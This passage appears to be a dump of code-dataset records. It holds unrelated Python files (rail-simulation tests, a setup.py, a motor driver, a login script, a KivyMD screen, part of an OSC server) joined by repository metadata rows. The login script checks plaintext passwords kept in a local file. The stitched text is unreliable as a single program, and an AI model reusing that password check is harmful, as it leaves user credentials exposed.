assert env.rail.get_full_transitions(26, 11) == 32800, "[26][11]"
assert env.rail.get_full_transitions(26, 12) == 32800, "[26][12]"
assert env.rail.get_full_transitions(26, 13) == 32800, "[26][13]"
assert env.rail.get_full_transitions(26, 14) == 0, "[26][14]"
assert env.rail.get_full_transitions(26, 15) == 0, "[26][15]"
assert env.rail.get_full_transitions(26, 16) == 0, "[26][16]"
assert env.rail.get_full_transitions(26, 17) == 0, "[26][17]"
assert env.rail.get_full_transitions(26, 18) == 0, "[26][18]"
assert env.rail.get_full_transitions(26, 19) == 32872, "[26][19]"
assert env.rail.get_full_transitions(26, 20) == 37408, "[26][20]"
assert env.rail.get_full_transitions(26, 21) == 32800, "[26][21]"
assert env.rail.get_full_transitions(26, 22) == 0, "[26][22]"
assert env.rail.get_full_transitions(26, 23) == 0, "[26][23]"
assert env.rail.get_full_transitions(26, 24) == 0, "[26][24]"
assert env.rail.get_full_transitions(27, 0) == 0, "[27][0]"
assert env.rail.get_full_transitions(27, 1) == 0, "[27][1]"
assert env.rail.get_full_transitions(27, 2) == 0, "[27][2]"
assert env.rail.get_full_transitions(27, 3) == 0, "[27][3]"
assert env.rail.get_full_transitions(27, 4) == 0, "[27][4]"
assert env.rail.get_full_transitions(27, 5) == 0, "[27][5]"
assert env.rail.get_full_transitions(27, 6) == 0, "[27][6]"
assert env.rail.get_full_transitions(27, 7) == 0, "[27][7]"
assert env.rail.get_full_transitions(27, 8) == 0, "[27][8]"
assert env.rail.get_full_transitions(27, 9) == 0, "[27][9]"
assert env.rail.get_full_transitions(27, 10) == 0, "[27][10]"
assert env.rail.get_full_transitions(27, 11) == 32800, "[27][11]"
assert env.rail.get_full_transitions(27, 12) == 32800, "[27][12]"
assert env.rail.get_full_transitions(27, 13) == 72, "[27][13]"
assert env.rail.get_full_transitions(27, 14) == 4608, "[27][14]"
assert env.rail.get_full_transitions(27, 15) == 0, "[27][15]"
assert env.rail.get_full_transitions(27, 16) == 0, "[27][16]"
assert env.rail.get_full_transitions(27, 17) == 0, "[27][17]"
assert env.rail.get_full_transitions(27, 18) == 0, "[27][18]"
assert env.rail.get_full_transitions(27, 19) == 49186, "[27][19]"
assert env.rail.get_full_transitions(27, 20) == 34864, "[27][20]"
assert env.rail.get_full_transitions(27, 21) == 32800, "[27][21]"
assert env.rail.get_full_transitions(27, 22) == 0, "[27][22]"
assert env.rail.get_full_transitions(27, 23) == 0, "[27][23]"
assert env.rail.get_full_transitions(27, 24) == 0, "[27][24]"
assert env.rail.get_full_transitions(28, 0) == 0, "[28][0]"
assert env.rail.get_full_transitions(28, 1) == 0, "[28][1]"
assert env.rail.get_full_transitions(28, 2) == 0, "[28][2]"
assert env.rail.get_full_transitions(28, 3) == 0, "[28][3]"
assert env.rail.get_full_transitions(28, 4) == 0, "[28][4]"
assert env.rail.get_full_transitions(28, 5) == 0, "[28][5]"
assert env.rail.get_full_transitions(28, 6) == 0, "[28][6]"
assert env.rail.get_full_transitions(28, 7) == 0, "[28][7]"
assert env.rail.get_full_transitions(28, 8) == 0, "[28][8]"
assert env.rail.get_full_transitions(28, 9) == 0, "[28][9]"
assert env.rail.get_full_transitions(28, 10) == 0, "[28][10]"
assert env.rail.get_full_transitions(28, 11) == 32800, "[28][11]"
assert env.rail.get_full_transitions(28, 12) == 72, "[28][12]"
assert env.rail.get_full_transitions(28, 13) == 1025, "[28][13]"
assert env.rail.get_full_transitions(28, 14) == 37408, "[28][14]"
assert env.rail.get_full_transitions(28, 15) == 0, "[28][15]"
assert env.rail.get_full_transitions(28, 16) == 0, "[28][16]"
assert env.rail.get_full_transitions(28, 17) == 0, "[28][17]"
assert env.rail.get_full_transitions(28, 18) == 0, "[28][18]"
assert env.rail.get_full_transitions(28, 19) == 32800, "[28][19]"
assert env.rail.get_full_transitions(28, 20) == 32800, "[28][20]"
assert env.rail.get_full_transitions(28, 21) == 32800, "[28][21]"
assert env.rail.get_full_transitions(28, 22) == 0, "[28][22]"
assert env.rail.get_full_transitions(28, 23) == 0, "[28][23]"
assert env.rail.get_full_transitions(28, 24) == 0, "[28][24]"
assert env.rail.get_full_transitions(29, 0) == 0, "[29][0]"
assert env.rail.get_full_transitions(29, 1) == 0, "[29][1]"
assert env.rail.get_full_transitions(29, 2) == 0, "[29][2]"
assert env.rail.get_full_transitions(29, 3) == 0, "[29][3]"
assert env.rail.get_full_transitions(29, 4) == 0, "[29][4]"
assert env.rail.get_full_transitions(29, 5) == 0, "[29][5]"
assert env.rail.get_full_transitions(29, 6) == 0, "[29][6]"
assert env.rail.get_full_transitions(29, 7) == 0, "[29][7]"
assert env.rail.get_full_transitions(29, 8) == 0, "[29][8]"
assert env.rail.get_full_transitions(29, 9) == 0, "[29][9]"
assert env.rail.get_full_transitions(29, 10) == 0, "[29][10]"
assert env.rail.get_full_transitions(29, 11) == 72, "[29][11]"
assert env.rail.get_full_transitions(29, 12) == 1025, "[29][12]"
assert env.rail.get_full_transitions(29, 13) == 1025, "[29][13]"
assert env.rail.get_full_transitions(29, 14) == 1097, "[29][14]"
assert env.rail.get_full_transitions(29, 15) == 1025, "[29][15]"
assert env.rail.get_full_transitions(29, 16) == 1025, "[29][16]"
assert env.rail.get_full_transitions(29, 17) == 1025, "[29][17]"
assert env.rail.get_full_transitions(29, 18) == 1025, "[29][18]"
assert env.rail.get_full_transitions(29, 19) == 3089, "[29][19]"
assert env.rail.get_full_transitions(29, 20) == 3089, "[29][20]"
assert env.rail.get_full_transitions(29, 21) == 2064, "[29][21]"
assert env.rail.get_full_transitions(29, 22) == 0, "[29][22]"
assert env.rail.get_full_transitions(29, 23) == 0, "[29][23]"
assert env.rail.get_full_transitions(29, 24) == 0, "[29][24]"
def test_rail_env_action_required_info():
speed_ration_map = {1.: 0.25, # Fast passenger train
1. / 2.: 0.25, # Fast freight train
1. / 3.: 0.25, # Slow commuter train
1. / 4.: 0.25} # Slow freight train
env_always_action = RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(
max_num_cities=10,
max_rails_between_cities=3,
seed=5, # Random seed
grid_mode=False # Ordered distribution of nodes
), schedule_generator=sparse_schedule_generator(speed_ration_map), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv(), remove_agents_at_target=False)
env_only_if_action_required = RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(
max_num_cities=10,
max_rails_between_cities=3,
seed=5, # Random seed
grid_mode=False
# Ordered distribution of nodes
), schedule_generator=sparse_schedule_generator(speed_ration_map), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv(), remove_agents_at_target=False)
env_renderer = RenderTool(env_always_action, gl="PILSVG", )
# Reset the envs
env_always_action.reset(False, False, True, random_seed=5)
env_only_if_action_required.reset(False, False, True, random_seed=5)
assert env_only_if_action_required.rail.grid.tolist() == env_always_action.rail.grid.tolist()
for step in range(50):
print("step {}".format(step))
action_dict_always_action = dict()
action_dict_only_if_action_required = dict()
# Chose an action for each agent in the environment
for a in range(env_always_action.get_num_agents()):
action = np.random.choice(np.arange(4))
action_dict_always_action.update({a: action})
if step == 0 or info_only_if_action_required['action_required'][a]:
action_dict_only_if_action_required.update({a: action})
else:
print("[{}] not action_required {}, speed_data={}".format(step, a,
env_always_action.agents[a].speed_data))
obs_always_action, rewards_always_action, done_always_action, info_always_action = env_always_action.step(
action_dict_always_action)
obs_only_if_action_required, rewards_only_if_action_required, done_only_if_action_required, info_only_if_action_required = env_only_if_action_required.step(
action_dict_only_if_action_required)
for a in range(env_always_action.get_num_agents()):
assert len(obs_always_action[a]) == len(obs_only_if_action_required[a])
for i in range(len(obs_always_action[a])):
assert len(obs_always_action[a][i]) == len(obs_only_if_action_required[a][i])
equal = np.array_equal(obs_always_action[a][i], obs_only_if_action_required[a][i])
if not equal:
for r in range(50):
for c in range(50):
assert np.array_equal(obs_always_action[a][i][(r, c)], obs_only_if_action_required[a][i][
(r, c)]), "[{}] a={},i={},{}\n{}\n\nvs.\n\n{}".format(step, a, i, (r, c),
obs_always_action[a][i][(r, c)],
obs_only_if_action_required[a][
i][(r, c)])
assert equal, \
"[{}] [{}][{}] {} vs. {}".format(step, a, i, obs_always_action[a][i],
obs_only_if_action_required[a][i])
assert np.array_equal(rewards_always_action[a], rewards_only_if_action_required[a])
assert np.array_equal(done_always_action[a], done_only_if_action_required[a])
assert info_always_action['action_required'][a] == info_only_if_action_required['action_required'][a]
env_renderer.render_env(show=True, show_observations=False, show_predictions=False)
if done_always_action['__all__']:
break
env_renderer.close_window()
def test_rail_env_malfunction_speed_info():
env = RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(max_num_cities=10,
max_rails_between_cities=3,
seed=5,
grid_mode=False
),
schedule_generator=sparse_schedule_generator(), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv())
env.reset(False, False, True)
env_renderer = RenderTool(env, gl="PILSVG", )
for step in range(100):
action_dict = dict()
# Chose an action for each agent in the environment
for a in range(env.get_num_agents()):
action = np.random.choice(np.arange(4))
action_dict.update({a: action})
obs, rewards, done, info = env.step(
action_dict)
assert 'malfunction' in info
for a in range(env.get_num_agents()):
assert info['malfunction'][a] >= 0
assert info['speed'][a] >= 0 and info['speed'][a] <= 1
assert info['speed'][a] == env.agents[a].speed_data['speed']
env_renderer.render_env(show=True, show_observations=False, show_predictions=False)
if done['__all__']:
break
env_renderer.close_window()
def test_sparse_generator_with_too_man_cities_does_not_break_down():
RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(
max_num_cities=100,
max_rails_between_cities=3,
seed=5,
grid_mode=False
), schedule_generator=sparse_schedule_generator(), number_of_agents=10, obs_builder_object=GlobalObsForRailEnv())
def test_sparse_generator_with_illegal_params_aborts():
"""
Test that the constructor aborts if the initial parameters don't allow more than one city to be built.
"""
with unittest.TestCase.assertRaises(test_sparse_generator_with_illegal_params_aborts, SystemExit):
RailEnv(width=6, height=6, rail_generator=sparse_rail_generator(
max_num_cities=100,
max_rails_between_cities=3,
seed=5,
grid_mode=False
), schedule_generator=sparse_schedule_generator(), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv()).reset()
with unittest.TestCase.assertRaises(test_sparse_generator_with_illegal_params_aborts, SystemExit):
RailEnv(width=60, height=60, rail_generator=sparse_rail_generator(
max_num_cities=1,
max_rails_between_cities=3,
seed=5,
grid_mode=False
), schedule_generator=sparse_schedule_generator(), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv()).reset()
def test_sparse_generator_changes_to_grid_mode():
"""
Test that grid mode is evoked and two cities are created when env is too small to find random cities.
We set the limit of the env such that two cities fit in grid mode but unlikely under random mode
we initiate random seed to be sure that we never create random cities.
"""
rail_env = RailEnv(width=10, height=20, rail_generator=sparse_rail_generator(
max_num_cities=100,
max_rails_between_cities=2,
max_rails_in_city=2,
seed=15,
grid_mode=False
), schedule_generator=sparse_schedule_generator(), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv())
for test_run in range(10):
with warnings.catch_warnings(record=True) as w:
rail_env.reset(True, True, True, random_seed=12)
assert "[WARNING]" in str(w[-1].message)
| 53.24147
| 164
| 0.636468
|
9a7082c94a928097352bd06e5f52289baf6a6e5c
| 1,458
|
py
|
Python
|
python/aixexplainer/setup.py
|
pvaneck/kserve
|
5ba63e74eadd66797b6681fcefd89d7e2462ffac
|
[
"Apache-2.0"
] | null | null | null |
python/aixexplainer/setup.py
|
pvaneck/kserve
|
5ba63e74eadd66797b6681fcefd89d7e2462ffac
|
[
"Apache-2.0"
] | null | null | null |
python/aixexplainer/setup.py
|
pvaneck/kserve
|
5ba63e74eadd66797b6681fcefd89d7e2462ffac
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
tests_require = [
'pytest',
'pytest-tornasync',
'mypy'
]
setup(
name='aixserver',
version='0.2.1',
author_email='Andrew.Butler@ibm.com',
license='https://github.com/kubeflow/kfserving/LICENSE',
url='https://github.com/kubeflow/kfserving/python/aixserver',
description='Model Server implementation for AI eXplainability with LIME. \
Not intended for use outside KFServing Frameworks Images',
long_description=open('README.md').read(),
python_requires='>3.4',
packages=find_packages("aixserver"),
install_requires=[
"kfserving>=0.4.0",
"argparse >= 1.4.0",
"numpy >= 1.8.2",
"aix360 >= 0.1.0",
"lime >= 0.1.1.37",
"nest_asyncio>=1.4.0"
],
tests_require=tests_require,
extras_require={'test': tests_require}
)
| 33.136364
| 79
| 0.683128
|
c5b463cd8a3faed3e0f06fb7ebe1011a5bfddef0
| 2,417
|
py
|
Python
|
motors/main.py
|
Abhiek187/floor-printing-robot
|
f1e5ffcdc74b4fb66a4f3607241a162016d58f99
|
[
"MIT"
] | null | null | null |
motors/main.py
|
Abhiek187/floor-printing-robot
|
f1e5ffcdc74b4fb66a4f3607241a162016d58f99
|
[
"MIT"
] | null | null | null |
motors/main.py
|
Abhiek187/floor-printing-robot
|
f1e5ffcdc74b4fb66a4f3607241a162016d58f99
|
[
"MIT"
] | 1
|
2020-03-08T00:28:29.000Z
|
2020-03-08T00:28:29.000Z
|
#!/usr/bin/python
from PCA9685 import PCA9685
from time import sleep
Dir = [
'forward',
'backward',
]
pwm = PCA9685(0x40, debug=False)
pwm.setPWMFreq(50) # freq range: 40 - 1000
class MotorDriver():
def __init__(self):
self.PWMA = 0
self.AIN1 = 1
self.AIN2 = 2
self.PWMB = 5
self.BIN1 = 3
self.BIN2 = 4
def MotorRun(self, motor, index, speed):
if speed > 100:
return
if motor == 0:
pwm.setDutycycle(self.PWMA, speed)
if index == Dir[0]:
pwm.setLevel(self.AIN1, 0)
pwm.setLevel(self.AIN2, 1)
else:
pwm.setLevel(self.AIN1, 1)
pwm.setLevel(self.AIN2, 0)
else:
pwm.setDutycycle(self.PWMB, speed)
if index == Dir[0]:
pwm.setLevel(self.BIN1, 0)
pwm.setLevel(self.BIN2, 1)
else:
pwm.setLevel(self.BIN1, 1)
pwm.setLevel(self.BIN2, 0)
def MotorStop(self, motor):
if motor == 0:
pwm.setDutycycle(self.PWMA, 0)
else:
pwm.setDutycycle(self.PWMB, 0)
"""
Notes:
Front of bot = side away from pi
Motor 1 moves the opposite of command and is slower than motor 0.
Speed range: 0 - 100
"""
def move_forward(speed, duration=0):
Motor.MotorRun(0, 'forward', speed*0.85)
Motor.MotorRun(1, 'backward', speed)
sleep(duration)
def move_backwards(speed, duration=0):
Motor.MotorRun(0, 'backward', speed*0.85)
Motor.MotorRun(1, 'forward', speed)
sleep(duration)
def turn_left(speed, duration=0):
Motor.MotorRun(0, 'backward', speed)
Motor.MotorRun(1, 'backward', speed)
sleep(duration)
def turn_right(speed, duration=0):
Motor.MotorRun(0, 'forward', speed)
Motor.MotorRun(1, 'forward', speed)
sleep(duration)
def stop(duration=0):
Motor.MotorStop(0)
Motor.MotorStop(1)
sleep(duration)
#print("Testing the motors...")
Motor = MotorDriver()
"""try:
while True:
print("Moving forward...")
move_forward(20, 1)
print("Moving backwards...")
move_backwards(20, 1)
print("Turning right...")
turn_right(40, 1)
print("Turning left...")
turn_left(40, 1)
except IOError as e:
print(e)
except KeyboardInterrupt:
print("Stopping the motors...")
stop()"""
| 23.466019
| 65
| 0.571783
|
71771d941c4063480220eae681d43eecb07edf6b
| 1,875
|
py
|
Python
|
website/.meta/login.html.py
|
ALo0f/CSE389Project
|
3b26fa432433c5b69b5de236a6f49d4a007d1fcb
|
[
"MIT"
] | 1
|
2020-10-21T03:18:33.000Z
|
2020-10-21T03:18:33.000Z
|
website/.meta/login.html.py
|
ALo0f/CSE389Project
|
3b26fa432433c5b69b5de236a6f49d4a007d1fcb
|
[
"MIT"
] | null | null | null |
website/.meta/login.html.py
|
ALo0f/CSE389Project
|
3b26fa432433c5b69b5de236a6f49d4a007d1fcb
|
[
"MIT"
] | 1
|
2020-11-05T02:54:25.000Z
|
2020-11-05T02:54:25.000Z
|
# script for handling login.html parameters
import os
import sys
import argparse
from email.utils import formatdate
HEADER_Accepted = [
"HTTP/1.1 302 Verified\r\n",
"Date: {}\r\n".format(formatdate(timeval=None, localtime=False, usegmt=True)),
"Server: Pr0j3ct subprocess\r\n",
"Location: /presentation.html\r\n"
]
HEADER_Rejected = [
"HTTP/1.1 403 Rejected\r\n",
"Date: {}\r\n".format(formatdate(timeval=None, localtime=False, usegmt=True)),
"Server: Pr0j3ct subprocess\r\n",
"Content-Length: {}\r\n",
"Content-Type: text/html; charset=utf-8\r\n"
]
def verify(rootDirectory, username, password):
"""
Load local database and verify username and password
"""
with open(os.path.join(rootDirectory, "users.keys"), "r") as inFile:
data = inFile.readlines()
for u, p in zip(data[0::2], data[1::2]):
if username == u.strip():
if password == p.strip(): return True
break
return False
def accept():
"""
print header_accpeted
"""
print("".join(HEADER_Accepted), end="")
print()
def reject(rootDirectory):
"""
print head rejected and print html content
"""
with open(os.path.join(rootDirectory, "login.html.rejected.html"), "r") as inFile:
data = inFile.read()
print("".join(HEADER_Rejected).format(len(data)), end="")
print()
print(data, end="")
print()
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--username", help="username for login")
parser.add_argument("--password", help="password for login")
args, _ = parser.parse_known_args()
if (args.username) and (args.password):
if verify(os.path.dirname(sys.argv[0]), args.username, args.password):
accept()
else:
reject(os.path.dirname(sys.argv[0]))
| 28.846154
| 86
| 0.6256
|
6f755ea0c2aa86763d3f5f985c5a57e02de40cc6
| 850
|
py
|
Python
|
demos/crane/libs/baseclass/root_screen.py
|
Jonypr-code/KivyMD
|
3ac5ba86430d9002baef678b47f0d7873b66b7bd
|
[
"MIT"
] | 1,111
|
2015-07-15T02:31:09.000Z
|
2022-03-29T17:22:02.000Z
|
demos/crane/libs/baseclass/root_screen.py
|
AllSafeCybercurity/kivyMD
|
85c51f3e7a26ca170d639e73899df5d465ee8941
|
[
"MIT"
] | 706
|
2015-06-10T22:24:13.000Z
|
2022-03-31T16:22:39.000Z
|
demos/crane/libs/baseclass/root_screen.py
|
AllSafeCybercurity/kivyMD
|
85c51f3e7a26ca170d639e73899df5d465ee8941
|
[
"MIT"
] | 561
|
2015-07-15T04:57:23.000Z
|
2022-03-31T17:14:31.000Z
|
from os import environ
from kivy.clock import Clock
from kivy.properties import StringProperty
from kivy.uix.image import Image
from kivymd.theming import ThemableBehavior
from kivymd.uix.boxlayout import MDBoxLayout
from kivymd.uix.screen import MDScreen
class CraneRootScreen(ThemableBehavior, MDScreen):
def __init__(self, **kwargs):
super().__init__(**kwargs)
Clock.schedule_once(self._late_init)
def _late_init(self, i):
self.image = Image(
source=f"{environ['CRANE_ROOT']}/assets/images/logo_light.png",
size_hint=(None, None),
size=("40dp", "40dp"),
)
self.ids.tab.tab_bar.add_widget(self.image, index=1)
class CraneListItem(ThemableBehavior, MDBoxLayout):
text = StringProperty()
secondary_text = StringProperty()
image = StringProperty()
| 28.333333
| 75
| 0.702353
|
7e4bab1adaa2f31d62bd7e85ed86081913415dc6
| 21,858
|
py
|
Python
|
oscpy/oscpy/server.py
|
WeilerWebServices/Kivy
|
54e3438156eb0c853790fd3cecc593f09123f892
|
[
"MIT"
] | 6
|
2021-12-25T08:57:23.000Z
|
2022-03-26T22:10:38.000Z
|
oscpy/server.py
|
simasimataiyo/IFJoiner
|
b6318dafde2c86759790f2f75675aec9e5560c70
|
[
"MIT"
] | null | null | null |
oscpy/server.py
|
simasimataiyo/IFJoiner
|
b6318dafde2c86759790f2f75675aec9e5560c70
|
[
"MIT"
] | null | null | null |
"""Server API.
This module currently only implements `OSCThreadServer`, a thread based server.
"""
import logging
from threading import Thread, Event
import os
import re
import inspect
from sys import platform
from time import sleep, time
from functools import partial
from select import select
import socket
from oscpy import __version__
from oscpy.parser import read_packet, UNICODE
from oscpy.client import send_bundle, send_message
from oscpy.stats import Stats
logger = logging.getLogger(__name__)
def ServerClass(cls):
"""Decorate classes with for methods implementing OSC endpoints.
This decorator is necessary on your class if you want to use the
`address_method` decorator on its methods, see
`:meth:OSCThreadServer.address_method`'s documentation.
"""
cls_init = cls.__init__
def __init__(self, *args, **kwargs):
cls_init(self, *args, **kwargs)
for m in dir(self):
meth = getattr(self, m)
if hasattr(meth, '_address'):
server, address, sock, get_address = meth._address
server.bind(address, meth, sock, get_address=get_address)
cls.__init__ = __init__
return cls
__FILE__ = inspect.getfile(ServerClass)
class OSCThreadServer(object):
"""A thread-based OSC server.
Listens for osc messages in a thread, and dispatches the messages
values to callbacks from there.
The '/_oscpy/' namespace is reserved for metadata about the OSCPy
internals, please see package documentation for further details.
"""
def __init__(
self, drop_late_bundles=False, timeout=0.01, advanced_matching=False,
encoding='', encoding_errors='strict', default_handler=None, intercept_errors=True
):
"""Create an OSCThreadServer.
- `timeout` is a number of seconds used as a time limit for
select() calls in the listening thread, optiomal, defaults to
0.01.
- `drop_late_bundles` instruct the server not to dispatch calls
from bundles that arrived after their timetag value.
(optional, defaults to False)
- `advanced_matching` (defaults to False), setting this to True
activates the pattern matching part of the specification, let
this to False if you don't need it, as it triggers a lot more
computation for each received message.
- `encoding` if defined, will be used to encode/decode all
strings sent/received to/from unicode/string objects, if left
empty, the interface will only accept bytes and return bytes
to callback functions.
- `encoding_errors` if `encoding` is set, this value will be
used as `errors` parameter in encode/decode calls.
- `default_handler` if defined, will be used to handle any
message that no configured address matched, the received
arguments will be (address, *values).
- `intercept_errors`, if True, means that exception raised by
callbacks will be intercepted and logged. If False, the handler
thread will terminate mostly silently on such exceptions.
"""
self._must_loop = True
self._termination_event = Event()
self.addresses = {}
self.sockets = []
self.timeout = timeout
self.default_socket = None
self.drop_late_bundles = drop_late_bundles
self.advanced_matching = advanced_matching
self.encoding = encoding
self.encoding_errors = encoding_errors
self.default_handler = default_handler
self.intercept_errors = intercept_errors
self.stats_received = Stats()
self.stats_sent = Stats()
t = Thread(target=self._run_listener)
t.daemon = True
t.start()
self._thread = t
self._smart_address_cache = {}
self._smart_part_cache = {}
def bind(self, address, callback, sock=None, get_address=False):
"""Bind a callback to an osc address.
A socket in the list of existing sockets of the server can be
given. If no socket is provided, the default socket of the
server is used, if no default socket has been defined, a
RuntimeError is raised.
Multiple callbacks can be bound to the same address.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
if isinstance(address, UNICODE) and self.encoding:
address = address.encode(
self.encoding, errors=self.encoding_errors)
if self.advanced_matching:
address = self.create_smart_address(address)
callbacks = self.addresses.get((sock, address), [])
cb = (callback, get_address)
if cb not in callbacks:
callbacks.append(cb)
self.addresses[(sock, address)] = callbacks
def create_smart_address(self, address):
"""Create an advanced matching address from a string.
The address will be split by '/' and each part will be converted
into a regexp, using the rules defined in the OSC specification.
"""
cache = self._smart_address_cache
if address in cache:
return cache[address]
else:
parts = address.split(b'/')
smart_parts = tuple(
re.compile(self._convert_part_to_regex(part)) for part in parts
)
cache[address] = smart_parts
return smart_parts
def _convert_part_to_regex(self, part):
cache = self._smart_part_cache
if part in cache:
return cache[part]
else:
r = [b'^']
for i, _ in enumerate(part):
# getting a 1 char byte string instead of an int in
# python3
c = part[i:i + 1]
if c == b'?':
r.append(b'.')
elif c == b'*':
r.append(b'.*')
elif c == b'[':
r.append(b'[')
elif c == b'!' and r and r[-1] == b'[':
r.append(b'^')
elif c == b']':
r.append(b']')
elif c == b'{':
r.append(b'(')
elif c == b',':
r.append(b'|')
elif c == b'}':
r.append(b')')
else:
r.append(c)
r.append(b'$')
smart_part = re.compile(b''.join(r))
cache[part] = smart_part
return smart_part
def unbind(self, address, callback, sock=None):
"""Unbind a callback from an OSC address.
See `bind` for `sock` documentation.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
if isinstance(address, UNICODE) and self.encoding:
address = address.encode(
self.encoding, errors=self.encoding_errors)
callbacks = self.addresses.get((sock, address), [])
to_remove = []
for cb in callbacks:
if cb[0] == callback:
to_remove.append(cb)
while to_remove:
callbacks.remove(to_remove.pop())
self.addresses[(sock, address)] = callbacks
def listen(
self, address='localhost', port=0, default=False, family='inet'
):
"""Start listening on an (address, port).
- if `port` is 0, the system will allocate a free port
- if `default` is True, the instance will save this socket as the
default one for subsequent calls to methods with an optional socket
- `family` accepts the 'unix' and 'inet' values, a socket of the
corresponding type will be created.
If family is 'unix', then the address must be a filename, the
`port` value won't be used. 'unix' sockets are not defined on
Windows.
The socket created to listen is returned, and can be used later
with methods accepting the `sock` parameter.
"""
if family == 'unix':
family_ = socket.AF_UNIX
elif family == 'inet':
family_ = socket.AF_INET
else:
raise ValueError(
"Unknown socket family, accepted values are 'unix' and 'inet'"
)
sock = socket.socket(family_, socket.SOCK_DGRAM)
if family == 'unix':
addr = address
else:
addr = (address, port)
sock.bind(addr)
self.sockets.append(sock)
if default and not self.default_socket:
self.default_socket = sock
elif default:
raise RuntimeError(
'Only one default socket authorized! Please set '
'default=False to other calls to listen()'
)
self.bind_meta_routes(sock)
return sock
def close(self, sock=None):
"""Close a socket opened by the server."""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
if platform != 'win32' and sock.family == socket.AF_UNIX:
os.unlink(sock.getsockname())
else:
sock.close()
if sock == self.default_socket:
self.default_socket = None
def getaddress(self, sock=None):
"""Wrap call to getsockname.
If `sock` is None, uses the default socket for the server.
Returns (ip, port) for an inet socket, or filename for an unix
socket.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
return sock.getsockname()
def stop(self, s=None):
"""Close and remove a socket from the server's sockets.
If `sock` is None, uses the default socket for the server.
"""
if not s and self.default_socket:
s = self.default_socket
if s in self.sockets:
read = select([s], [], [], 0)
s.close()
if s in read:
s.recvfrom(65535)
self.sockets.remove(s)
else:
raise RuntimeError('{} is not one of my sockets!'.format(s))
def stop_all(self):
"""Call stop on all the existing sockets."""
for s in self.sockets[:]:
self.stop(s)
sleep(10e-9)
def terminate_server(self):
"""Request the inner thread to finish its tasks and exit.
May be called from an event, too.
"""
self._must_loop = False
def join_server(self, timeout=None):
"""Wait for the server to exit (`terminate_server()` must have been called before).
Returns True if and only if the inner thread exited before timeout."""
return self._termination_event.wait(timeout=timeout)
def _run_listener(self):
"""Wrapper just ensuring that the handler thread cleans up on exit."""
try:
self._listen()
finally:
self._termination_event.set()
def _listen(self):
"""(internal) Busy loop to listen for events.
This method is called in a thread by the `listen` method, and
will be the one actually listening for messages on the server's
sockets, and calling the callbacks when messages are received.
"""
match = self._match_address
advanced_matching = self.advanced_matching
addresses = self.addresses
stats = self.stats_received
def _execute_callbacks(_callbacks_list):
for cb, get_address in _callbacks_list:
try:
if get_address:
cb(address, *values)
else:
cb(*values)
except Exception as exc:
if self.intercept_errors:
logger.error("Unhandled exception caught in oscpy server", exc_info=True)
else:
raise
while self._must_loop:
drop_late = self.drop_late_bundles
if not self.sockets:
sleep(.01)
continue
else:
try:
read, write, error = select(self.sockets, [], [], self.timeout)
except (ValueError, socket.error):
continue
for sender_socket in read:
try:
data, sender = sender_socket.recvfrom(65535)
except ConnectionResetError:
continue
for address, tags, values, offset in read_packet(
data, drop_late=drop_late, encoding=self.encoding,
encoding_errors=self.encoding_errors
):
stats.calls += 1
stats.bytes += offset
stats.params += len(values)
stats.types.update(tags)
matched = False
if advanced_matching:
for sock, addr in addresses:
if sock == sender_socket and match(addr, address):
callbacks_list = addresses.get((sock, addr), [])
if callbacks_list:
matched = True
_execute_callbacks(callbacks_list)
else:
callbacks_list = addresses.get((sender_socket, address), [])
if callbacks_list:
matched = True
_execute_callbacks(callbacks_list)
if not matched and self.default_handler:
self.default_handler(address, *values)
@staticmethod
def _match_address(smart_address, target_address):
"""(internal) Check if provided `smart_address` matches address.
A `smart_address` is a list of regexps to match
against the parts of the `target_address`.
"""
target_parts = target_address.split(b'/')
if len(target_parts) != len(smart_address):
return False
return all(
model.match(part)
for model, part in
zip(smart_address, target_parts)
)
def send_message(
self, osc_address, values, ip_address, port, sock=None, safer=False
):
"""Shortcut to the client's `send_message` method.
Use the default_socket of the server by default.
See `client.send_message` for more info about the parameters.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
stats = send_message(
osc_address,
values,
ip_address,
port,
sock=sock,
safer=safer,
encoding=self.encoding,
encoding_errors=self.encoding_errors
)
self.stats_sent += stats
return stats
def send_bundle(
self, messages, ip_address, port, timetag=None, sock=None, safer=False
):
"""Shortcut to the client's `send_bundle` method.
Use the `default_socket` of the server by default.
See `client.send_bundle` for more info about the parameters.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
stats = send_bundle(
messages,
ip_address,
port,
sock=sock,
safer=safer,
encoding=self.encoding,
encoding_errors=self.encoding_errors
)
self.stats_sent += stats
return stats
def get_sender(self):
"""Return the socket, ip and port of the message that is currently being managed.
Warning::
this method should only be called from inside the handling
of a message (i.e, inside a callback).
"""
frames = inspect.getouterframes(inspect.currentframe())
for frame, filename, _, function, _, _ in frames:
if function == '_listen' and __FILE__.startswith(filename):
break
else:
raise RuntimeError('get_sender() not called from a callback')
sock = frame.f_locals.get('sender_socket')
address, port = frame.f_locals.get('sender')
return sock, address, port
def answer(
self, address=None, values=None, bundle=None, timetag=None,
safer=False, port=None
):
"""Answers a message or bundle to a client.
This method can only be called from a callback, it will lookup
